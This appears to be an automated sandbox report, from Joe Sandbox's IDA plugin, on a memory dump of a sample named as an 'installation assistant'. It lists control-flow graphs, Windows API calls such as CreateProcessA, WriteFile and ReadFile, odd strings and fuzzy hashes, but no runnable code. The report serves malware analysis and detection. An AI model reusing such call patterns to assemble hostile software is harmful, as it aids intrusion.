                                                          • Instruction Fuzzy Hash: 17C1C170A04349AFDF01DFA8C880BADBBF5AF4A318F624159E810AB781C775B945CF61

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 6933 6c0e406c-6c0e409c call 6c0e44ec 6936 6c0e409e-6c0e40a9 call 6c0cf9df 6933->6936 6937 6c0e40b7-6c0e40c3 call 6c0e160c 6933->6937 6944 6c0e40ab-6c0e40b2 call 6c0cf9cc 6936->6944 6942 6c0e40dc-6c0e4125 call 6c0e4457 6937->6942 6943 6c0e40c5-6c0e40da call 6c0cf9df call 6c0cf9cc 6937->6943 6953 6c0e4127-6c0e4130 6942->6953 6954 6c0e4192-6c0e419b GetFileType 6942->6954 6943->6944 6951 6c0e4391-6c0e4395 6944->6951 6958 6c0e4167-6c0e418d GetLastError call 6c0cf9f2 6953->6958 6959 6c0e4132-6c0e4136 6953->6959 6955 6c0e419d-6c0e41ce GetLastError call 6c0cf9f2 CloseHandle 6954->6955 6956 6c0e41e4-6c0e41e7 6954->6956 6955->6944 6972 6c0e41d4-6c0e41df call 6c0cf9cc 6955->6972 6962 6c0e41e9-6c0e41ee 6956->6962 6963 6c0e41f0-6c0e41f6 6956->6963 6958->6944 6959->6958 6964 6c0e4138-6c0e4165 call 6c0e4457 6959->6964 6967 6c0e41fa-6c0e4248 call 6c0e17b0 6962->6967 6963->6967 6968 6c0e41f8 6963->6968 6964->6954 6964->6958 6975 6c0e424a-6c0e4256 call 6c0e4666 6967->6975 6976 6c0e4267-6c0e428f call 6c0e4710 6967->6976 6968->6967 6972->6944 6975->6976 6982 6c0e4258 6975->6982 6983 6c0e4294-6c0e42d5 6976->6983 6984 6c0e4291-6c0e4292 6976->6984 6985 6c0e425a-6c0e4262 call 6c0db925 6982->6985 6986 6c0e42f6-6c0e4304 6983->6986 6987 6c0e42d7-6c0e42db 6983->6987 6984->6985 6985->6951 6988 6c0e438f 6986->6988 6989 6c0e430a-6c0e430e 6986->6989 6987->6986 6991 6c0e42dd-6c0e42f1 6987->6991 6988->6951 6989->6988 6992 6c0e4310-6c0e4343 CloseHandle call 6c0e4457 6989->6992 6991->6986 6996 6c0e4377-6c0e438b 6992->6996 6997 6c0e4345-6c0e4371 GetLastError call 6c0cf9f2 call 6c0e171f 6992->6997 6996->6988 6997->6996
                                                          APIs
                                                            • Part of subcall function 6C0E4457: CreateFileW.KERNEL32(00000000,00000000,?,6C0E4115,?,?,00000000,?,6C0E4115,00000000,0000000C), ref: 6C0E4474
                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C0E4180
                                                          • __dosmaperr.LIBCMT ref: 6C0E4187
                                                          • GetFileType.KERNEL32(00000000), ref: 6C0E4193
                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C0E419D
                                                          • __dosmaperr.LIBCMT ref: 6C0E41A6
                                                          • CloseHandle.KERNEL32(00000000), ref: 6C0E41C6
                                                          • CloseHandle.KERNEL32(6C0DB0D0), ref: 6C0E4313
                                                          • GetLastError.KERNEL32 ref: 6C0E4345
                                                          • __dosmaperr.LIBCMT ref: 6C0E434C
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.1961971982.000000006BF41000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BF40000, based on PE: true
                                                          • Associated: 00000006.00000002.1961944811.000000006BF40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000006.00000002.1963403655.000000006C0E8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000006.00000002.1963479404.000000006C0F8000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000006.00000002.1964075919.000000006C1C3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000006.00000002.1964110138.000000006C1C9000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000006.00000002.1964811575.000000006C2B2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_6bf40000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                          Similarity
                                                          • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                          • String ID: 8Q
                                                          • API String ID: 4237864984-4022487301
                                                          • Opcode ID: 9dab5ff5c27ff3c177b540aef4e2b4068de638490a8959ea33cc85aa92c498bd
                                                          • Instruction ID: 8afdc2ddee86b38afdf8e44a6b0db1599d3271820675e7391979958d4474ca53
                                                          • Opcode Fuzzy Hash: 9dab5ff5c27ff3c177b540aef4e2b4068de638490a8959ea33cc85aa92c498bd
                                                          • Instruction Fuzzy Hash: 34A13732A44144AFCF098FE8C8517AE7BF1EB4A328F18425DE811EB781CB359906DB52

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 7002 6c09c1e0-6c09c239 call 6c0c6b70 7005 6c09c260-6c09c269 7002->7005 7006 6c09c26b-6c09c270 7005->7006 7007 6c09c2b0-6c09c2b5 7005->7007 7008 6c09c2f0-6c09c2f5 7006->7008 7009 6c09c272-6c09c277 7006->7009 7010 6c09c330-6c09c335 7007->7010 7011 6c09c2b7-6c09c2bc 7007->7011 7018 6c09c2fb-6c09c300 7008->7018 7019 6c09c431-6c09c448 WriteFile 7008->7019 7014 6c09c27d-6c09c282 7009->7014 7015 6c09c372-6c09c3df WriteFile 7009->7015 7012 6c09c489-6c09c4b9 call 6c0cb3a0 7010->7012 7013 6c09c33b-6c09c340 7010->7013 7016 6c09c2c2-6c09c2c7 7011->7016 7017 6c09c407-6c09c41b 7011->7017 7012->7005 7021 6c09c4be-6c09c4c3 7013->7021 7022 6c09c346-6c09c36d 7013->7022 7023 6c09c3e9-6c09c3fd WriteFile 7014->7023 7024 6c09c288-6c09c28d 7014->7024 7015->7023 7026 6c09c23b-6c09c250 7016->7026 7027 6c09c2cd-6c09c2d2 7016->7027 7025 6c09c41f-6c09c42c 7017->7025 7028 6c09c452-6c09c47f call 6c0cb920 ReadFile 7018->7028 7029 6c09c306-6c09c30b 7018->7029 7019->7028 7021->7005 7033 6c09c4c9-6c09c4d7 7021->7033 7031 6c09c253-6c09c258 7022->7031 7023->7017 7024->7005 7034 6c09c28f-6c09c2aa 7024->7034 7025->7005 7026->7031 7027->7005 7035 6c09c2d4-6c09c2e7 7027->7035 7028->7012 7029->7005 7030 6c09c311-6c09c32b 7029->7030 7030->7025 7031->7005 7034->7031 7035->7031
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.1961971982.000000006BF41000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BF40000, based on PE: true
                                                          • Associated: 00000006.00000002.1961944811.000000006BF40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000006.00000002.1963403655.000000006C0E8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000006.00000002.1963479404.000000006C0F8000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000006.00000002.1964075919.000000006C1C3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000006.00000002.1964110138.000000006C1C9000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000006.00000002.1964811575.000000006C2B2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_6bf40000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: :uW$;uW$;uW$> 4!$> 4!
                                                          • API String ID: 0-4100612575
                                                          • Opcode ID: b1445b618c7aa92d96fb00cf4796f704948f5c41d8ce401ccba9449a3585a30a
                                                          • Instruction ID: 0f0072b5db2f6e650b3c52e0f36c91d2ab546b208418a8b5cae8184dd50a2cea
                                                          • Opcode Fuzzy Hash: b1445b618c7aa92d96fb00cf4796f704948f5c41d8ce401ccba9449a3585a30a
                                                          • Instruction Fuzzy Hash: B9718BB0608345AFD710DF54C880B6ABBF4FF8A708F50592EF598D6650D375D888AB93
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.1961971982.000000006BF41000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BF40000, based on PE: true
                                                          • Associated: 00000006.00000002.1961944811.000000006BF40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000006.00000002.1963403655.000000006C0E8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000006.00000002.1963479404.000000006C0F8000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000006.00000002.1964075919.000000006C1C3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000006.00000002.1964110138.000000006C1C9000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000006.00000002.1964811575.000000006C2B2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_6bf40000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: K?Jo$K?Jo$`Rlx$7eO
                                                          • API String ID: 0-174837320
                                                          • Opcode ID: fa87c0a37d206f426255af6af38d90e2ce7b4d1c3faf0e5eebdf31c9df6928d1
                                                          • Instruction ID: 184e1737b15399ce202cecced1161912909be6ba25ad0c9d90241cfaff4b316e
                                                          • Opcode Fuzzy Hash: fa87c0a37d206f426255af6af38d90e2ce7b4d1c3faf0e5eebdf31c9df6928d1
                                                          • Instruction Fuzzy Hash: B34257B46093428FC764CF18C090B2EBBE1AFC9324F24AE1EE5A587B60D634D945DB53
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.1961971982.000000006BF41000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BF40000, based on PE: true
                                                          • Associated: 00000006.00000002.1961944811.000000006BF40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000006.00000002.1963403655.000000006C0E8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000006.00000002.1963479404.000000006C0F8000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000006.00000002.1964075919.000000006C1C3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000006.00000002.1964110138.000000006C1C9000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000006.00000002.1964811575.000000006C2B2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_6bf40000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: ;T55
                                                          • API String ID: 0-2572755013
                                                          • Opcode ID: 882a942a3ebf22f3de10f2238167002744bfbbd36881f2ce467499a5b86c5a83
                                                          • Instruction ID: 13b00e5229b5c323a3f6e191573bb66299600866ea993f79ee8d5cd41a8ea94f
                                                          • Opcode Fuzzy Hash: 882a942a3ebf22f3de10f2238167002744bfbbd36881f2ce467499a5b86c5a83
                                                          • Instruction Fuzzy Hash: D703E633644B018FC728CF28C8D0695B7E3EFD53247198AADC4E64B6A5DB78B54ACB50

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 7579 6c0c4ff0-6c0c5077 CreateProcessA 7580 6c0c50ca-6c0c50d3 7579->7580 7581 6c0c50d5-6c0c50da 7580->7581 7582 6c0c50f0-6c0c510b 7580->7582 7583 6c0c50dc-6c0c50e1 7581->7583 7584 6c0c5080-6c0c50c2 WaitForSingleObject CloseHandle * 2 7581->7584 7582->7580 7583->7580 7585 6c0c50e3-6c0c5118 7583->7585 7584->7580
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.1961971982.000000006BF41000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BF40000, based on PE: true
                                                          • Associated: 00000006.00000002.1961944811.000000006BF40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000006.00000002.1963403655.000000006C0E8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000006.00000002.1963479404.000000006C0F8000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000006.00000002.1964075919.000000006C1C3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000006.00000002.1964110138.000000006C1C9000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000006.00000002.1964811575.000000006C2B2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_6bf40000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                          Similarity
                                                          • API ID: CreateProcess
                                                          • String ID: D
                                                          • API String ID: 963392458-2746444292
                                                          • Opcode ID: 9dcf08a206b3bbdf5edb8452cc1b5ea630d27265aeb26ec27a3b7b8d2bc1043b
                                                          • Instruction ID: f3485eeb0170fdabbf81bf86da3f3bb234bab1787c6a3de5d1c2a6a1a58bc4ab
                                                          • Opcode Fuzzy Hash: 9dcf08a206b3bbdf5edb8452cc1b5ea630d27265aeb26ec27a3b7b8d2bc1043b
                                                          • Instruction Fuzzy Hash: 6F3102749093808FD340DF28C19872EBBF0EB8A358F505A1DF8D986250E7789588CF43

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 7587 6c0dbc5e-6c0dbc7a 7588 6c0dbe39 7587->7588 7589 6c0dbc80-6c0dbc82 7587->7589 7590 6c0dbe3b-6c0dbe3f 7588->7590 7591 6c0dbca4-6c0dbcc5 7589->7591 7592 6c0dbc84-6c0dbc97 call 6c0cf9df call 6c0cf9cc call 6c0d0120 7589->7592 7593 6c0dbccc-6c0dbcd2 7591->7593 7594 6c0dbcc7-6c0dbcca 7591->7594 7609 6c0dbc9c-6c0dbc9f 7592->7609 7593->7592 7596 6c0dbcd4-6c0dbcd9 7593->7596 7594->7593 7594->7596 7598 6c0dbcdb-6c0dbce7 call 6c0dac69 7596->7598 7599 6c0dbcea-6c0dbcfb call 6c0dbe40 7596->7599 7598->7599 7607 6c0dbcfd-6c0dbcff 7599->7607 7608 6c0dbd3c-6c0dbd4e 7599->7608 7612 6c0dbd26-6c0dbd32 call 6c0dbeb1 7607->7612 7613 6c0dbd01-6c0dbd09 7607->7613 7610 6c0dbd95-6c0dbdb7 WriteFile 7608->7610 7611 6c0dbd50-6c0dbd59 7608->7611 7609->7590 7614 6c0dbdb9-6c0dbdbf GetLastError 7610->7614 7615 6c0dbdc2 7610->7615 7617 6c0dbd5b-6c0dbd5e 7611->7617 7618 6c0dbd85-6c0dbd93 call 6c0dc2c3 7611->7618 7621 6c0dbd37-6c0dbd3a 7612->7621 7619 6c0dbd0f-6c0dbd1c call 6c0dc25b 7613->7619 7620 6c0dbdcb-6c0dbdce 7613->7620 7614->7615 7622 6c0dbdc5-6c0dbdca 7615->7622 7624 6c0dbd75-6c0dbd83 call 6c0dc487 7617->7624 7625 6c0dbd60-6c0dbd63 7617->7625 7618->7621 7628 6c0dbd1f-6c0dbd21 7619->7628 7623 6c0dbdd1-6c0dbdd6 7620->7623 7621->7628 7622->7620 7629 6c0dbdd8-6c0dbddd 7623->7629 7630 6c0dbe34-6c0dbe37 7623->7630 7624->7621 7625->7623 7631 6c0dbd65-6c0dbd73 call 6c0dc39e 7625->7631 7628->7622 7635 6c0dbddf-6c0dbde4 7629->7635 7636 6c0dbe09-6c0dbe15 7629->7636 7630->7590 7631->7621 7641 6c0dbdfd-6c0dbe04 call 6c0cf9f2 7635->7641 7642 6c0dbde6-6c0dbdf8 call 6c0cf9cc call 6c0cf9df 7635->7642 7639 6c0dbe1c-6c0dbe2f call 6c0cf9cc call 6c0cf9df 7636->7639 7640 6c0dbe17-6c0dbe1a 7636->7640 7639->7609 7640->7588 7640->7639 7641->7609 7642->7609
                                                          APIs
                                                            • Part of subcall function 6C0DBEB1: GetConsoleCP.KERNEL32(?,6C0DB0D0,?), ref: 6C0DBEF9
                                                          • WriteFile.KERNEL32(?,?,6C0E46EC,00000000,00000000,?,00000000,00000000,6C0E5AB6,00000000,00000000,?,00000000,6C0DB0D0,6C0E46EC,00000000), ref: 6C0DBDAF
                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,6C0E46EC,6C0DB0D0,00000000,?,?,?,?,00000000,?), ref: 6C0DBDB9
                                                          • __dosmaperr.LIBCMT ref: 6C0DBDFE
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.1961971982.000000006BF41000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BF40000, based on PE: true
                                                          • Associated: 00000006.00000002.1961944811.000000006BF40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000006.00000002.1963403655.000000006C0E8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000006.00000002.1963479404.000000006C0F8000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000006.00000002.1964075919.000000006C1C3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000006.00000002.1964110138.000000006C1C9000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000006.00000002.1964811575.000000006C2B2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_6bf40000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                          Similarity
                                                          • API ID: ConsoleErrorFileLastWrite__dosmaperr
                                                          • String ID: 8Q
                                                          • API String ID: 251514795-4022487301
                                                          • Opcode ID: 132285a8fa8aca1c0651a57070ff89c829d90fad215e5c4a8c0cfb44fa15ad61
                                                          • Instruction ID: 6e45ec93a3c751a8b5fc8aa818508e07b0289fd478fad7561c28b72f8184161c
                                                          • Opcode Fuzzy Hash: 132285a8fa8aca1c0651a57070ff89c829d90fad215e5c4a8c0cfb44fa15ad61
                                                          • Instruction Fuzzy Hash: 4F51C571A0030AAFDF019FA8C840BEEBBF9EF05358F560551E510A7A51DB70B945CBA1

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 7654 6c0c5b90-6c0c5b9c 7655 6c0c5bdd 7654->7655 7656 6c0c5b9e-6c0c5ba9 7654->7656 7657 6c0c5bdf-6c0c5c57 7655->7657 7658 6c0c5bbf-6c0c5bcc call 6bf901f0 call 6c0d0b18 7656->7658 7659 6c0c5bab-6c0c5bbd 7656->7659 7660 6c0c5c59-6c0c5c81 7657->7660 7661 6c0c5c83-6c0c5c89 7657->7661 7667 6c0c5bd1-6c0c5bdb 7658->7667 7659->7658 7660->7661 7663 6c0c5c8a-6c0c5d49 call 6bf92250 call 6bf92340 call 6c0c9379 call 6bf8e010 call 6c0c7088 7660->7663 7667->7657
                                                          APIs
                                                          • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 6C0C5D31
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.1961971982.000000006BF41000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BF40000, based on PE: true
                                                          • Associated: 00000006.00000002.1961944811.000000006BF40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000006.00000002.1963403655.000000006C0E8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000006.00000002.1963479404.000000006C0F8000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000006.00000002.1964075919.000000006C1C3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000006.00000002.1964110138.000000006C1C9000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000006.00000002.1964811575.000000006C2B2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_6bf40000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                          Similarity
                                                          • API ID: Ios_base_dtorstd::ios_base::_
                                                          • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                          • API String ID: 323602529-1866435925
                                                          • Opcode ID: c79c6338b80c732580a1861a99dd2322247e7119c57e508d310e656da3cd90ab
                                                          • Instruction ID: 983d45d8af53bba410f8ff734203849c4d6d8c996710b88a30bb91d1233496ac
                                                          • Opcode Fuzzy Hash: c79c6338b80c732580a1861a99dd2322247e7119c57e508d310e656da3cd90ab
                                                          • Instruction Fuzzy Hash: 565124B5600B008FD725CF29C495BA6BBF1FB48318F508A2DD89647B90D775B909CF91

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 7699 6c0db925-6c0db939 call 6c0e15a2 7702 6c0db93f-6c0db947 7699->7702 7703 6c0db93b-6c0db93d 7699->7703 7705 6c0db949-6c0db950 7702->7705 7706 6c0db952-6c0db955 7702->7706 7704 6c0db98d-6c0db9ad call 6c0e171f 7703->7704 7715 6c0db9af-6c0db9b9 call 6c0cf9f2 7704->7715 7716 6c0db9bb 7704->7716 7705->7706 7708 6c0db95d-6c0db971 call 6c0e15a2 * 2 7705->7708 7709 6c0db957-6c0db95b 7706->7709 7710 6c0db973-6c0db983 call 6c0e15a2 CloseHandle 7706->7710 7708->7703 7708->7710 7709->7708 7709->7710 7710->7703 7718 6c0db985-6c0db98b GetLastError 7710->7718 7720 6c0db9bd-6c0db9c0 7715->7720 7716->7720 7718->7704
                                                          APIs
                                                          • CloseHandle.KERNEL32(00000000,?,00000000,?,6C0E425F), ref: 6C0DB97B
                                                          • GetLastError.KERNEL32(?,00000000,?,6C0E425F), ref: 6C0DB985
                                                          • __dosmaperr.LIBCMT ref: 6C0DB9B0
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.1961971982.000000006BF41000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BF40000, based on PE: true
                                                          • Associated: 00000006.00000002.1961944811.000000006BF40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000006.00000002.1963403655.000000006C0E8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000006.00000002.1963479404.000000006C0F8000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000006.00000002.1964075919.000000006C1C3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000006.00000002.1964110138.000000006C1C9000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000006.00000002.1964811575.000000006C2B2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_6bf40000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                          Similarity
                                                          • API ID: CloseErrorHandleLast__dosmaperr
                                                          • String ID:
                                                          • API String ID: 2583163307-0
                                                          • Opcode ID: 77c5d9b0f400e6da8f716973a57377b2c3964bad2feb51d3807e18e5d3c6867e
                                                          • Instruction ID: bc4c40d611272a1f64b0d0a304d7ea03436eaaa6075fb142002965c1c6ba4a66
                                                          • Opcode Fuzzy Hash: 77c5d9b0f400e6da8f716973a57377b2c3964bad2feb51d3807e18e5d3c6867e
                                                          • Instruction Fuzzy Hash: F6014833A452A05AC201077AA845B9DA7E94F87B3CF2A4709E82587AC2CF60F885C290

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 7944 6c0d0b9c-6c0d0ba7 7945 6c0d0bbe-6c0d0bcb 7944->7945 7946 6c0d0ba9-6c0d0bbc call 6c0cf9cc call 6c0d0120 7944->7946 7948 6c0d0bcd-6c0d0be2 call 6c0d0cb9 call 6c0d873e call 6c0d9c60 call 6c0db898 7945->7948 7949 6c0d0c06-6c0d0c0f call 6c0dae75 7945->7949 7957 6c0d0c10-6c0d0c12 7946->7957 7963 6c0d0be7-6c0d0bec 7948->7963 7949->7957 7964 6c0d0bee-6c0d0bf1 7963->7964 7965 6c0d0bf3-6c0d0bf7 7963->7965 7964->7949 7965->7949 7966 6c0d0bf9-6c0d0c05 call 6c0d47bb 7965->7966 7966->7949
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.1961971982.000000006BF41000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BF40000, based on PE: true
                                                          • Associated: 00000006.00000002.1961944811.000000006BF40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000006.00000002.1963403655.000000006C0E8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000006.00000002.1963479404.000000006C0F8000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000006.00000002.1964075919.000000006C1C3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000006.00000002.1964110138.000000006C1C9000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000006.00000002.1964811575.000000006C2B2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_6bf40000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 8Q
                                                          • API String ID: 0-4022487301
                                                          • Opcode ID: 0eceabb69cc212cdc16fe4ea4eed4d534fb07063be66ce5869ee3001f537518c
                                                          • Instruction ID: 6da696bc5f27015316ce5573d13d56b6a4f9cc28bc80b1d3ffd870fe0d96020a
                                                          • Opcode Fuzzy Hash: 0eceabb69cc212cdc16fe4ea4eed4d534fb07063be66ce5869ee3001f537518c
                                                          • Instruction Fuzzy Hash: F0F0F4325097546AC6211B39AC00BDB36D89F4237CF231715E87893ED0DB70F40ACAE2
                                                          APIs
                                                          • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 6C0C5AB4
                                                          • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 6C0C5AF4
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.1961971982.000000006BF41000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BF40000, based on PE: true
                                                          • Associated: 00000006.00000002.1961944811.000000006BF40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000006.00000002.1963403655.000000006C0E8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000006.00000002.1963479404.000000006C0F8000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000006.00000002.1964075919.000000006C1C3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000006.00000002.1964110138.000000006C1C9000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000006.00000002.1964811575.000000006C2B2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_6bf40000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                          Similarity
                                                          • API ID: Ios_base_dtorstd::ios_base::_
                                                          • String ID:
                                                          • API String ID: 323602529-0
                                                          • Opcode ID: 60309b47636b8b73f2600095ab1510f0a8a66e70a24c263812ef35a8af43ede4
                                                          • Instruction ID: d9b69faea24a0d0aa227bdb4362e91bb81dd11d9ba1effada35ab4dd24cb77dd
                                                          • Opcode Fuzzy Hash: 60309b47636b8b73f2600095ab1510f0a8a66e70a24c263812ef35a8af43ede4
                                                          • Instruction Fuzzy Hash: FC514975201B01DFD725CF25C485BE6BBF4FB08718F448A1CE8AA4B6A1DB34B549CB81
                                                          APIs
                                                          • GetLastError.KERNEL32(6C0F6DD8,0000000C), ref: 6C0CEF52
                                                          • ExitThread.KERNEL32 ref: 6C0CEF59
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.1961971982.000000006BF41000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BF40000, based on PE: true
                                                          • Associated: 00000006.00000002.1961944811.000000006BF40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000006.00000002.1963403655.000000006C0E8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000006.00000002.1963479404.000000006C0F8000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000006.00000002.1964075919.000000006C1C3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000006.00000002.1964110138.000000006C1C9000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000006.00000002.1964811575.000000006C2B2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_6bf40000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                          Similarity
                                                          • API ID: ErrorExitLastThread
                                                          • String ID:
                                                          • API String ID: 1611280651-0
                                                          • Opcode ID: c97eda8bd8b9acfee6997c42a3fad485c7ca6dda280eea3b9cb18656e85dca3c
                                                          • Instruction ID: 7ff4d836846209e06997e57566a70cd09646bb0a13e0e9b1abeaac93bbe6340f
                                                          • Opcode Fuzzy Hash: c97eda8bd8b9acfee6997c42a3fad485c7ca6dda280eea3b9cb18656e85dca3c
                                                          • Instruction Fuzzy Hash: FAF0AFB1A00204AFDF009FB0D40ABAE3BF4FF41218F154649E42597B40CF34B946DBA2
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.1961971982.000000006BF41000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BF40000, based on PE: true
